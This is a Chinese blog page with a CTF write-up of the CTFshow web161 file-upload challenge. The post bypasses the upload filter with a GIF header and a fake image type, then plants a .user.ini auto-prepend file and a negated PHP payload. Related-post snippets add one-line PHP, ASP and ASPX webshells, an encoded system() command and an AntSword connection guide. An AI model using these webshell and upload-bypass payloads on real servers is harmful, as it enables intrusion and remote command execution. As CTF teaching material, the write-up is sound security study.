CTFshow 文件上传 web161

Kradress

已于 2022-02-16 00:19:29 修改

阅读量478

点赞数

CC 4.0 BY-SA版权

分类专栏： CTFshow 文章标签： php

于 2022-02-15 23:18:23 首次发布

本文链接：https://blog.youkuaiyun.com/Kracxi/article/details/122953697

本文介绍了如何通过修改请求参数，规避文件上传中的内容检测，利用.image/png类型并添加GIF89a头部，以及确保文件内容足够长，成功上传.user.ini文件，并通过URL解码获取到flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

思路

直接在burp里面改target和host的值,或者在本地发包
在这里插入图片描述

在上传.user.ini发现失败,可能对文件内容进行检测

在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容

其他都和上题一样

.user.ini

GIF89a
auto_prepend_file=shell.png

shell.png
记得url解码

GIF89a
<?=require~%

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFshow-文件上传web161-170

qq_52579508的博客

08-12

369

一开始发现不管输入什么都不行，添加了GIF头成功通过上传校验第二步上传图片，包含了日志的文件进行解析第三步访问 /upload 目录会解析日志文件添加user-agent 头里面添加一句话第四步连接shell 获取flag。

CTFshow之文件上传web入门151关-161关解密。包教包会！！！！

2301_77578012的博客

05-23

1558

当网站进行扫描时，会将.user.ini文件指向路径内容包含在首页代码处（如index.php、index.html等），使用参数auto_prepend_file（包含至首页文件头部）和auto_append_file（包含在首页文件尾部）进行配置。发送一句话木马，修改content-type值为：image/png，此处注意一下，我直接上传.php文件发现无法通过，定睛一看才发现前端验证还没关，汗颜！上传1.png的木马。2.上传.user.ini文件（使用bp中repaeater重发器功能进行上传）

参与评论您还未登录，请先登录后发表或查看评论

ctfshow-web入门-文件上传（web161、web162、web163）远程包含

Welcome To Myon'Blog !

07-09

2605

后面又去 b 站看了下视频，发现它远程包含的就是一个 php 文件，而我这里包含的 shell 是一个纯文本的东西，我最开始以为是将这段内容包含进了 index.php 的代码里，所以就没有考虑它不是 php 后缀是否可以正常解析的问题。后面问了群里的师傅，说用 flask，我原本用的是 Apache 搭的服务，重置了服务器，Apache 和 php 其实都是刚下的，可能还需要配置点什么吧，不清楚，因此我们将木马放到 flask 服务上去。那么我们上传的文件名就不使用后缀即可：这里以 test 为例。

ctfshow文件上传

njh18790816639的博客

04-23

920

web151(前端限制) 这里需要上传图片木马！所以我们需要先制作一张图片木马！ php的一句话木马： <?php @eval($_POST['pass']);?> asp的一句话是： <%eval request ("pass")%> aspx的一句话是： <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 这里是比较常用的一句话木马！ copy 1.png/b

ctfshow 文件上传161-167

qq_52671379的博客

04-08

2071

ctfshow 文件上传161-167

CTFshow 文件上传 web163

Kradress的博客

02-16

774

目录源码思路总结源码思路先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat

CTFshow 文件上传 web162

Kradress的博客

02-15

2302

目录思路总结思路大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%

ctfshow web151-161（文件上传一）

m0_74057302的博客

03-04

2219

我这一生如履薄冰，你说我还能到对岸吗？？？

ctfshow web入门 web161-165

m0_62207170的博客

10-27

1288

ctfshow web入门 web161-165

ctfshow 文件上传 web151 - web161

最新发布

2301_78931332的博客

03-08

1015

ctfshow web151-161 文件上传

CTFshow 文件上传 web160

Kradress的博客

02-15

681

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包成功上传.user.ini auto_prepend_file=shell.png 继续用取反来解取反脚本 $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~("; for ($i = 0; $i < strlen($a); $i++) { echo "%".bin2hex(~$a[$i]); } echo ")"

ctfshow [web] 文件上传 156--160

weixin_68906365的博客

02-18

359

可以在User-Agent处写入php代码，在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传，可以先上传.user.ini 文件然后再上传写有木马的png图片，然后访问/upload页面。可以上传.user.ini文件，new.png也可以正常上传，操作和上题一样。过滤了空格，导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件，不过木马上传失败了。看了一眼题解，发现括号被过滤了，需要用反引号执行命令。短标签开启：（配置文件：php.ini）

ctfshow—web151-160

akxnxbshai的博客

02-04

2013

目录 Web 151-152 Web 153 Web 154 Web 155 Web 156 Web 157-159 Web 160 Web 151-152 直接上传文件，然后抓包改后缀再用蚁剑连一下，找到flag即可 Web 153 php文件无法上传。发现服务器是nginx，考点是上传.user.ini配置文件，upload文件夹自带一个index.php，使其预加载木马先后上传文件.user.ini和1.txt(注意抓包改名称) 两个上传后访问/uplo

CTFSHOW web160 文件上传

Mirror_iu的博客

07-26

1280

CTFSHOW web160详解

ctfshow-web入门-文件上传（web151-web160）

Welcome To Myon'Blog !

07-07

2239

试了下前端只能传 png 后缀的将一句话木马改成 png 后缀，上传后用 burpsuite 抓包绕过前端检测后，改回 php 后缀，发包拿到 flag：ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码：原本只支持上传 png 后缀的文件我们加一个 php 后缀进去，即可直接上传 php 后缀的文件。

ctfshow web入门 文件上传 web151--web161

2301_81040377的博客

04-07

638

我本来是想用POST的方法获得flag的但是不知道为什么突然用不了了。把Content-Type改为 image/png就可以了。打算用bp改文件形式(可能没操作好)我重新试了一下抓不到。他后面肯定还会过滤东西我们直接搞个升级版。把很多符号过滤了直接摊牌我要看flag。鼠标右键（检查），把png改为php。然后一样的操作上传成功（不会的私信）对php进行了过滤，写一个新马。重新开了靶机发现也可以哈哈哈。上传没有回显加了图片头才行。xxx就是我们上传的文件。然后用的antsword。然后把上传的文件改为。

ctfshow web入门 文件上传web162--web167

2301_81040377的博客

04-09

1115

我们上传的文件如果不符合要求，就会被删除，导致成功上传无法访问，没有用。但是如果我们上传的速度比服务器删的速度快，就可以了。#### 本题总结可能你们并不觉得这道题难但是这道题确实难到我了，我做了很久总结一下可能错误的点。一样的操作，如上题，如果代码跑不出来，要么忘记改要么就是没有放包。然后进入下载页面的时候抓包（“下载文件的时候抓包”）压缩文件太大或者太小导致上传不成功或者很难去。,你们可以自己修改，把脚本的也改了就是。访问上传的文件，进行命令执行。只能上传压缩文件，我们就在。里面添加一句话木马就行了。

ctfshow web入门 文件上传前篇(web151-web160)

ccfly1012的博客

09-17

1239

目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈： <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制)，上传文件同时进行抓包，然后修改后缀php，然后蚁剑连接，找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...

ctfshow web162-170

m0_74057302的博客

03-13

2330

往事暗沉不可追，来日之路光明灿烂

ctfshow web入门文件上传蚁剑连接

01-02

### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作为了成功完成文件上传并利用蚁剑建立连接，需先准备环境。确保已安装蚁剑客户端，并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建创建一个简单的PHP反向Shell脚本 `shell.php`： ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ，则可构造如下表单数据提交至服务器： ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果确认文件是否成功上载到远程服务器指定目录下。通常情况下，可以通过浏览器直接访问该路径来验证，例如：`http://example.com/uploads/shell.php` 。如果页面返回空白，则说明上传成功。 #### 使用蚁剑连接启动蚁剑工具，在新建站点时输入相应的参数配置： - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”，随后即可尝试与远端服务器建立会话连接[^3]。